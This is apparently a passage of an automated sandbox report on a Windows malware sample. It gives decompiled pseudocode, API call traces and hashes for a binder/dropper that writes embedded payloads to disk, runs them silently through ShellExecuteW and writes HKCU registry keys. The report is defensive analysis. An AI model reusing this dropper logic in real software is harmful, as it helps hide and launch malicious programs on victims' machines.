                  								E10005324( &_v5672);
                  								_push(_v5672);
                  								_push(E1000BCA4);
                  								E100038E0( &_v5676, 0x105, _t233);
                  								_push(_v5676);
                  								_t284 = 3;
                  								E100039EC();
                  							}
                  							_t150 = E1000391C(_v16);
                  							asm("cdq");
                  							_push(_t284);
                  							_push(_t150 + _t150);
                  							_push(E1000390C(_v16));
                  							_t316 = E1000390C(_v12);
                  							_pop(_t285); // executed
                  							E10005EB4(_t316, _t285); // executed
                  							_t158 =  *((intOrPtr*)(_t233 + 0x21c));
                  							__eflags = _t158 - 2;
                  							if(_t158 != 2) {
                  								__eflags = _t158 - 1;
                  								if(_t158 != 1) {
                  									__eflags = _t158;
                  									if(_t158 == 0) {
                  										ShellExecuteW(0, L"open", _t316, 0, 0, 1); // executed
                  									}
                  								} else {
                  									ShellExecuteW(0, L"open", _t316, 0, 0, 0);
                  								}
                  							}
                  							continue;
                  						}
                  						_push(0);
                  						_push( &_v5588);
                  						E100038E0( &_v5592, 0x105, _t233);
                  						_push(_v5592);
                  						E100034B0( &_v5604, 0x3d,  &_v1018);
                  						E1000352C( &_v5600, _v5604, "SOFTWARE\\");
                  						E100038FC( &_v5596, _v5600);
                  						_pop(_t258);
                  						E1000553C(0x80000001, _t233, _t258, _v5596, _t316);
                  						E10003A34(_v5588, E1000BC98);
                  						if(__eflags == 0) {
                  							continue;
                  						} else {
                  							_push(E1000BC98);
                  							_push(2);
                  							E100038E0( &_v5608, 0x105, _t233);
                  							_push(_v5608);
                  							E100034B0( &_v5620, 0x3d,  &_v1018);
                  							E1000352C( &_v5616, _v5620, "SOFTWARE\\");
                  							E100038FC( &_v5612, _v5616);
                  							_pop(_t262);
                  							E1000577C(0x80000001, _t233, _t262, _v5612, _t316, __eflags);
                  							goto L9;
                  						}
                  					}
                  					goto L29;
                  				}
                  				L1:
                  				_push(0);
                  				_push(0);
                  				_t234 = _t234 - 1;
                  				if(_t234 != 0) {
                  					goto L1;
                  				} else {
                  					_push(_t234);
                  					_t316 = __eax;
                  					memcpy( &_v5028, __eax, 0x4e4 << 2);
                  					_t314 =  &(_t316[0x4e4]);
                  					_t233 =  &_v5580;
                  					_push(_t318);
                  					_push(0x1000bc5d);
                  					_push( *[fs:eax]);
                  					 *[fs:eax] = _t319 + 0xc;
                  					E1000B700( &_v8);
                  					E10003A34(_v8, 0);
                  					if(0 != 0) {
                  						E10006404(_v8, _t233,  &_v5584, L"BINDER", _t316, 0);
                  						E100037D0( &_v8, _v5584);
                  					}
                  					goto L4;
                  				}
                  			}

                  APIs
                    • Part of subcall function 10003770: SysFreeString.OLEAUT32(1000CFDC), ref: 1000377E
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 1000BBC4
                    • Part of subcall function 1000553C: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,10005628,?,1000F834,?), ref: 10005591
                    • Part of subcall function 1000553C: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,10005628,?,1000F834,?), ref: 100055B5
                    • Part of subcall function 1000553C: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 100055E6
                    • Part of subcall function 1000553C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,10005628,?,1000F834), ref: 10005600
                    • Part of subcall function 1000577C: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 100057C2
                    • Part of subcall function 1000577C: RegSetValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057EE
                    • Part of subcall function 1000577C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057FD
                  • DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,1000BC5D,?,1000F834,00000000,00000000,000002C4,00000000), ref: 1000BB79
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 1000BBDD
                    • Part of subcall function 100053D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 10005406
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Value$CloseExecuteQueryShell$CreateDeleteDirectoryFileFreeOpenStringSystem
                  • String ID: .exe$.xtr$BINDER$SOFTWARE\$open
                  • API String ID: 3529233218-3085899294
                  • Opcode ID: 0a22a47b740f272aa9815302f1ca917ca28341e751ca6317fe122055c7ff1c0c
                  • Instruction ID: e2e431fa4438d6138b358157023902ea7bce804184865157e4dc89de6df5abab
                  • Opcode Fuzzy Hash: 0a22a47b740f272aa9815302f1ca917ca28341e751ca6317fe122055c7ff1c0c
                  • Instruction Fuzzy Hash: 33C11C38A005199BFB25DB54CC82BCFB3B9EB84381F5080B5B509AB249DE75FE858F51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 77%
                  			E100054BC(intOrPtr* __eax, void* __ebx, void* __edx) {
                  				short _v528;
                  				short* _t9;
                  				signed int _t10;
                  				intOrPtr _t11;
                  				intOrPtr _t14;
                  				void* _t19;
                  				int _t23;
                  				void* _t33;
                  				WCHAR* _t34;
                  
                  				_t9 = __eax +  *__eax;
                  				 *_t9 = _t9 +  *_t9;
                  				_pop(_t33);
                  				 *_t9 = _t9 +  *_t9;
                  				 *((intOrPtr*)(__ebx + 0x56)) =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
                  				_push(__ebx);
                  				_t34 = _t33 + 0xfffffdf4;
                  				_t10 = GetTempPathW(0x104, _t34);
                  				_t11 =  *0x1000e0ac; // 0x0
                  				_push(E1000391C(_t11) + _t12);
                  				_t14 =  *0x1000e0ac; // 0x0
                  				E100050D0(_t34 + 4 + _t10 * 2, E1000390C(_t14));
                  				_t19 = CreateFileW( &_v528, 0x40000000, 2, 0, 2, 0x80, 0); // executed
                  				CloseHandle(_t19);
                  				FindExecutableW( &_v528, 0, _t9); // executed
                  				_t23 = DeleteFileW(_t34); // executed
                  				return _t23;
                  			}

                  0x100054bc
                  0x100054be
                  0x100054c0
                  0x100054c1
                  0x100054c3
                  0x100054c4
                  0x100054c6
                  0x100054d4
                  0x100054db
                  0x100054e7
                  0x100054e8
                  0x100054f9
                  0x10005515
                  0x1000551b
                  0x10005528
                  0x1000552e
                  0x1000553b

                  APIs
                  • GetTempPathW.KERNEL32(00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 100054D4
                  • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000), ref: 10005515
                  • CloseHandle.KERNEL32(00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 1000551B
                  • FindExecutableW.SHELL32(?,00000000,?), ref: 10005528
                  • DeleteFileW.KERNEL32(?,00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe), ref: 1000552E
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateDeleteExecutableFindHandlePathTemp
                  • String ID:
                  • API String ID: 3048815070-0
                  • Opcode ID: 684a10809eaa70b2404493bbaa18f3f048d77b0755fa25e4f9c2802281bd8911
                  • Instruction ID: 3ea9f2177f4edda36d5c03afde6c78b2b523ab1dccb69f8e5379325d0c4c700b
                  • Opcode Fuzzy Hash: 684a10809eaa70b2404493bbaa18f3f048d77b0755fa25e4f9c2802281bd8911
                  • Instruction Fuzzy Hash: B9F0A4B56453806FF311D7B4EC87FCB3B98CB01390F154462B240EA1EBEDA0B80483AA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E100054C4(short* __eax, void* __eflags) {
                  				short _v532;
                  				signed int _t7;
                  				intOrPtr _t8;
                  				intOrPtr _t11;
                  				void* _t16;
                  				int _t20;
                  				short* _t24;
                  				WCHAR* _t25;
                  
                  				_t24 = __eax;
                  				_t7 = GetTempPathW(0x104, _t25);
                  				_t8 =  *0x1000e0ac; // 0x0
                  				_push(E1000391C(_t8) + _t9);
                  				_t11 =  *0x1000e0ac; // 0x0
                  				E100050D0(_t25 + 4 + _t7 * 2, E1000390C(_t11));
                  				_t16 = CreateFileW( &_v532, 0x40000000, 2, 0, 2, 0x80, 0); // executed
                  				CloseHandle(_t16);
                  				FindExecutableW( &_v532, 0, _t24); // executed
                  				_t20 = DeleteFileW(_t25); // executed
                  				return _t20;
                  			}

                  0x100054cc
                  0x100054d4
                  0x100054db
                  0x100054e7
                  0x100054e8
                  0x100054f9
                  0x10005515
                  0x1000551b
                  0x10005528
                  0x1000552e
                  0x1000553b

                  APIs
                  • GetTempPathW.KERNEL32(00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 100054D4
                  • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000), ref: 10005515
                  • CloseHandle.KERNEL32(00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 1000551B
                  • FindExecutableW.SHELL32(?,00000000,?), ref: 10005528
                  • DeleteFileW.KERNEL32(?,00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe), ref: 1000552E
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateDeleteExecutableFindHandlePathTemp
                  • String ID:
                  • API String ID: 3048815070-0
                  • Opcode ID: 91bf4206e82319b8f66e9d503df7ed6300f54588c471e2c123916036fc16f990
                  • Instruction ID: b8191a8fbfdb6de079f1d7f918beb96f752e281eea5dde0cd3b62906432631ca
                  • Opcode Fuzzy Hash: 91bf4206e82319b8f66e9d503df7ed6300f54588c471e2c123916036fc16f990
                  • Instruction Fuzzy Hash: 3BF030B96413147BF210E7B4EC87FDB369CDB407D0F214521B244EA1DAEEA1BD4486EA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E10005EB4(WCHAR* __eax, void* __edx, long _a4, intOrPtr _a8) {
                  				long _v8;
                  				void* _t6;
                  				void* _t13;
                  				void* _t15;
                  				void* _t16;
                  
                  				_t15 = __edx;
                  				_t13 = 0;
                  				_t6 = CreateFileW(__eax, 0x40000000, 2, 0, 2, 0, 0); // executed
                  				_t16 = _t6;
                  				if(_t16 != 0xffffffff) {
                  					if(_a8 == 0 && _a4 == 0xffffffff) {
                  						SetFilePointer(_t16, 0, 0, 0);
                  					}
                  					WriteFile(_t16, _t15, _a4,  &_v8, 0); // executed
                  					asm("sbb ebx, ebx");
                  					_t13 = _t13 + 1;
                  				}
                  				CloseHandle(_t16); // executed
                  				return _t13;
                  			}

                  0x10005ebb
                  0x10005ebd
                  0x10005ecf
                  0x10005ed4
                  0x10005ed9
                  0x10005edf
                  0x10005eee
                  0x10005eee
                  0x10005eff
                  0x10005f07
                  0x10005f09
                  0x10005f09
                  0x10005f0b
                  0x10005f17

                  APIs
                  • CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,?,1000F834,?,?,?,1000BB19,00000004,00000000,00000002), ref: 10005ECF
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,?,1000F834,?), ref: 10005EEE
                  • WriteFile.KERNEL32(00000000,1000BCB8,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,?,1000F834,?), ref: 10005EFF
                  • CloseHandle.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,?,1000F834,?,?,?,1000BB19,00000004,00000000), ref: 10005F0B
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandlePointerWrite
                  • String ID:
                  • API String ID: 3604237281-0
                  • Opcode ID: 58547b8991d288027538c5d1d651dd5776961dce18e03299eac774a2063ccca9
                  • Instruction ID: e4f3c4844a55c36be20b49d11d00148b33621b8e0b4bed1061d4f26ea208953b
                  • Opcode Fuzzy Hash: 58547b8991d288027538c5d1d651dd5776961dce18e03299eac774a2063ccca9
                  • Instruction Fuzzy Hash: 2CF0F6762413157DF620D965AC87F9B624CDB41BF5F214236F614A90C0CAA16E0582A9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 51%
                  			E10006090(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				struct _ITEMIDLIST* _v8;
                  				char _v12;
                  				void _v534;
                  				long _t28;
                  				intOrPtr* _t33;
                  				struct _ITEMIDLIST* _t37;
                  				int _t46;
                  				intOrPtr _t58;
                  				intOrPtr _t60;
                  				void* _t69;
                  				void* _t73;
                  				void* _t74;
                  				intOrPtr _t75;
                  
                  				_t73 = _t74;
                  				_t75 = _t74 + 0xfffffdec;
                  				_v12 = 0;
                  				_t69 = __edx;
                  				_t46 = __eax;
                  				_push(_t73);
                  				_push(0x1000618b);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t75;
                  				E100046DC( &_v12);
                  				E100050D8();
                  				_push(E100046DC( &_v12)); // executed
                  				L10006078(); // executed
                  				if(_v12 != 0) {
                  					_push(_t73);
                  					_push(0x1000616e);
                  					_push( *[fs:eax]);
                  					 *[fs:eax] = _t75;
                  					_t28 = SHGetSpecialFolderLocation(0, _t46,  &_v8); // executed
                  					if(E1000606C(_t28) != 0) {
                  						_push( &_v534);
                  						_t37 = _v8;
                  						_push(_t37); // executed
                  						L10006088(); // executed
                  						asm("sbb eax, eax");
                  						if(_t37 + 1 == 0) {
                  							E100050D8();
                  						}
                  					}
                  					memcpy(_t69,  &_v534, 0x82 << 2);
                  					asm("movsw");
                  					_pop(_t58);
                  					 *[fs:eax] = _t58;
                  					_t33 = _v12;
                  					return  *((intOrPtr*)( *_t33 + 0x14))(_t33, _v8, E10006175);
                  				} else {
                  					memcpy(_t69,  &_v534, 0x82 << 2);
                  					asm("movsw");
                  					_pop(_t60);
                  					 *[fs:eax] = _t60;
                  					_push(E10006192);
                  					return E100046DC( &_v12);
                  				}
                  			}

                  0x10006091
                  0x10006093
                  0x1000609e
                  0x100060a1
                  0x100060a3
                  0x100060a7
                  0x100060a8
                  0x100060ad
                  0x100060b0
                  0x100060b6
                  0x100060c6
                  0x100060d3
                  0x100060d4
                  0x100060dd
                  0x100060f7
                  0x100060f8
                  0x100060fd
                  0x10006100
                  0x1000610a
                  0x10006116
                  0x1000611e
                  0x1000611f
                  0x10006122
                  0x10006123
                  0x1000612b
                  0x10006130
                  0x1000613d
                  0x1000613d
                  0x10006130
                  0x1000614f
                  0x10006151
                  0x10006155
                  0x10006158
                  0x10006164
                  0x1000616d
                  0x100060df
                  0x100060ec
                  0x100060ee
                  0x10006177
                  0x1000617a
                  0x1000617d
                  0x1000618a
                  0x1000618a

                  APIs
                  • SHGetMalloc.SHELL32(00000000), ref: 100060D4
                  • SHGetSpecialFolderLocation.SHELL32(00000000,0000001A,?,00000000,1000616E,?,00000000,1000618B,?,1000F834,1000F834,?,?,10005673,?,1000D2C2), ref: 1000610A
                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 10006123
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: FolderFromListLocationMallocPathSpecial
                  • String ID:
                  • API String ID: 628029987-0
                  • Opcode ID: f6cc65bf62ea17e1061210d62eb0f9c292ca39f545557847811f4f652a5415d6
                  • Instruction ID: f5f1894c3c3aa185a840a3eadd195327b621776b8329dab3f1fb33b6c646e1e3
                  • Opcode Fuzzy Hash: f6cc65bf62ea17e1061210d62eb0f9c292ca39f545557847811f4f652a5415d6
                  • Instruction Fuzzy Hash: C021AEB5904108AFEB11DAA4CC54ADF77BEEB4D380F6144B0B905E360ADA35AF19CA21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E1000577C(void* __eax, void* __ebx, char __ecx, char __edx, void* __esi, void* __eflags, int _a4, char _a8) {
                  				char _v8;
                  				char _v12;
                  				void* _v16;
                  				void* _t29;
                  				char* _t32;
                  				long _t37;
                  				intOrPtr _t52;
                  				void* _t55;
                  				void* _t58;
                  
                  				_v12 = __ecx;
                  				_v8 = __edx;
                  				_t55 = __eax;
                  				E10003C28( &_v8);
                  				E10003C28( &_v12);
                  				E10003C28( &_a8);
                  				_push(_t58);
                  				_push(0x10005825);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t58 + 0xfffffff4;
                  				RegCreateKeyW(_t55, E1000390C(_v8),  &_v16); // executed
                  				_t29 = E1000391C(_a8);
                  				_t32 = E1000390C(_a8);
                  				_t37 = RegSetValueExW(_v16, E1000390C(_v12), 0, _a4, _t32, _t29 + _t29); // executed
                  				if(_t37 == 0) {
                  				}
                  				RegCloseKey(_v16); // executed
                  				_pop(_t52);
                  				 *[fs:eax] = _t52;
                  				_push(E1000582C);
                  				E10003788( &_v12, 2);
                  				return E10003770( &_a8);
                  			}

                  0x10005784
                  0x10005787
                  0x1000578a
                  0x1000578f
                  0x10005797
                  0x1000579f
                  0x100057a6
                  0x100057a7
                  0x100057ac
                  0x100057af
                  0x100057c2
                  0x100057ca
                  0x100057d5
                  0x100057ee
                  0x100057f5
                  0x100057f5
                  0x100057fd
                  0x10005804
                  0x10005807
                  0x1000580a
                  0x10005817
                  0x10005824

                  APIs
                    • Part of subcall function 10003C28: SysAllocStringLen.OLEAUT32(CONFIG,?), ref: 10003C36
                  • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 100057C2
                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057EE
                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057FD
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: AllocCloseCreateStringValue
                  • String ID:
                  • API String ID: 2140091102-0
                  • Opcode ID: 8386abb8985e96b7e742ca73356f96697864f8e82dd8d2b35a464892efa59d00
                  • Instruction ID: 0dd5ed0a943e6cb984665ac1d2623c356232ef0b36590c9567a6f14ca7775770
                  • Opcode Fuzzy Hash: 8386abb8985e96b7e742ca73356f96697864f8e82dd8d2b35a464892efa59d00
                  • Instruction Fuzzy Hash: 3511DDB9904108BFE741DBA4DC42D9F77ECDF04290F518575B914E7215EB70AE109B50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 57%
                  			E10003C28(signed int __eax) {
                  				signed char _t15;
                  				void* _t17;
                  				void* _t21;
                  
                  				_t4 = __eax;
                  				_t17 =  *__eax;
                  				if(_t17 == 0) {
                  					return __eax;
                  				} else {
                  					_push(__eax);
                  					_push( *(__edx - 4) >> 1);
                  					L10001128(); // executed
                  					__edx = __edx;
                  					if(__eax != 0) {
                  						 *__edx = __eax;
                  						return __eax;
                  					}
                  					__eax = __eax & 0x0000007f;
                  					__edx =  *__esp;
                  					_t21 = _t17;
                  					_t15 = _t4 & 0x0000007f;
                  					if( *0x1000f008 != 0) {
                  						 *0x1000f008();
                  					}
                  					if(_t15 != 0) {
                  						if(_t15 <= 0x18) {
                  							_t2 = _t15 + 0x1000e038; // 0xd7c9c8cc
                  							_t15 =  *_t2;
                  						}
                  					} else {
                  						_t15 =  *(E10004C98() + 4);
                  					}
                  					return E10002590(_t21);
                  				}
                  			}

                  0x10003c28
                  0x10003c28
                  0x10003c2c
                  0x10003c46
                  0x10003c2e
                  0x10003c2e
                  0x10003c34
                  0x10003c36
                  0x10003c3b
                  0x10003c3e
                  0x10003c44
                  0x00000000
                  0x10003c44
                  0x100025e8
                  0x100025eb
                  0x1000259e
                  0x100025a2
                  0x100025ac
                  0x100025b2
                  0x100025b2
                  0x100025ba
                  0x100025cc
                  0x100025d2
                  0x100025d2
                  0x100025d2
                  0x100025bc
                  0x100025c1
                  0x100025c1
                  0x100025e5
                  0x100025e5

                  APIs
                  • SysAllocStringLen.OLEAUT32(CONFIG,?), ref: 10003C36
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: AllocString
                  • String ID: CONFIG
                  • API String ID: 2525500382-611510522
                  • Opcode ID: 579fd664f3d77bebe830f344424d39ed6552b91152c30b79336f2dffc289d31d
                  • Instruction ID: 25e1bc4a7362bba16a589b72a0d6fee5176ce5d44e135c61f892b3ac78b80433
                  • Opcode Fuzzy Hash: 579fd664f3d77bebe830f344424d39ed6552b91152c30b79336f2dffc289d31d
                  • Instruction Fuzzy Hash: B0D012F82045025A779DCE18896596BB3EFDBC25C1361C258A501DE14CDB31E841DB20
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E10003158() {
                  				struct HINSTANCE__* _t24;
                  				void* _t32;
                  				intOrPtr _t35;
                  				void* _t45;
                  
                  				if( *0x1000F64C != 0 ||  *0x1000f034 == 0) {
                  					L3:
                  					if( *0x1000e004 != 0) {
                  						E10003040();
                  						E100030CC(_t32);
                  						 *0x1000e004 = 0;
                  					}
                  					L5:
                  					while(1) {
                  						if( *((char*)(0x1000f64c)) == 2 &&  *0x1000e000 == 0) {
                  							 *0x1000F630 = 0;
                  						}
                  						E10002F24(); // executed
                  						if( *((char*)(0x1000f64c)) <= 1 ||  *0x1000e000 != 0) {
                  							_t14 =  *0x1000F634;
                  							if( *0x1000F634 != 0) {
                  								E1000466C(_t14);
                  								_t35 =  *((intOrPtr*)(0x1000f634));
                  								_t7 = _t35 + 0x10; // 0x0
                  								_t24 =  *_t7;
                  								_t8 = _t35 + 4; // 0x10000000
                  								if(_t24 !=  *_t8 && _t24 != 0) {
                  									FreeLibrary(_t24);
                  								}
                  							}
                  						}
                  						E10002EFC();
                  						if( *((char*)(0x1000f64c)) == 1) {
                  							 *0x1000F648();
                  						}
                  						if( *((char*)(0x1000f64c)) != 0) {
                  							E1000309C();
                  						}
                  						if( *0x1000f624 == 0) {
                  							if( *0x1000f018 != 0) {
                  								 *0x1000f018();
                  							}
                  							ExitProcess( *0x1000e000); // executed
                  						}
                  						memcpy(0x1000f624,  *0x1000f624, 0xb << 2);
                  						_t45 = _t45 + 0xc;
                  						0x1000e000 = 0x1000e000;
                  					}
                  				} else {
                  					do {
                  						 *0x1000f034 = 0;
                  						 *((intOrPtr*)( *0x1000f034))();
                  					} while ( *0x1000f034 != 0);
                  					goto L3;
                  				}
                  			}

                  0x1000316f
                  0x10003187
                  0x1000318e
                  0x10003190
                  0x10003195
                  0x1000319c
                  0x1000319c
                  0x00000000
                  0x100031a1
                  0x100031a5
                  0x100031ae
                  0x100031ae
                  0x100031b1
                  0x100031ba
                  0x100031c1
                  0x100031c6
                  0x100031c8
                  0x100031cd
                  0x100031d0
                  0x100031d0
                  0x100031d3
                  0x100031d6
                  0x100031dd
                  0x100031dd
                  0x100031d6
                  0x100031c6
                  0x100031e2
                  0x100031eb
                  0x100031ed
                  0x100031ed
                  0x100031f4
                  0x100031f6
                  0x100031f6
                  0x100031fe
                  0x10003207
                  0x10003209
                  0x10003209
                  0x10003212
                  0x10003212
                  0x10003223
                  0x10003223
                  0x10003225
                  0x10003225
                  0x10003176
                  0x10003176
                  0x1000317c
                  0x10003180
                  0x10003182
                  0x00000000
                  0x10003176

                  APIs
                  • FreeLibrary.KERNEL32(10000000,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000,10002538,?,1000D702,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 100031DD
                  • ExitProcess.KERNEL32(00000000,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000,10002538,?,1000D702,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 10003212
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: ExitFreeLibraryProcess
                  • String ID:
                  • API String ID: 1404682716-0
                  • Opcode ID: a7d26fcc6f4fce9ecc30ffe483834d278041aa4daacdb7ce10931836dbac7f8e
                  • Instruction ID: 102873f78adbb93bbd2a11590cb18782e29a3d6c26b998e20b0a0626f3baee5f
                  • Opcode Fuzzy Hash: a7d26fcc6f4fce9ecc30ffe483834d278041aa4daacdb7ce10931836dbac7f8e
                  • Instruction Fuzzy Hash: 132148B49002819BFB52DB64C48879677EDEB093D0F26C569D8448B18ED775DCC4C791
                  Uniqueness

                  Uniqueness Score: -1.00%
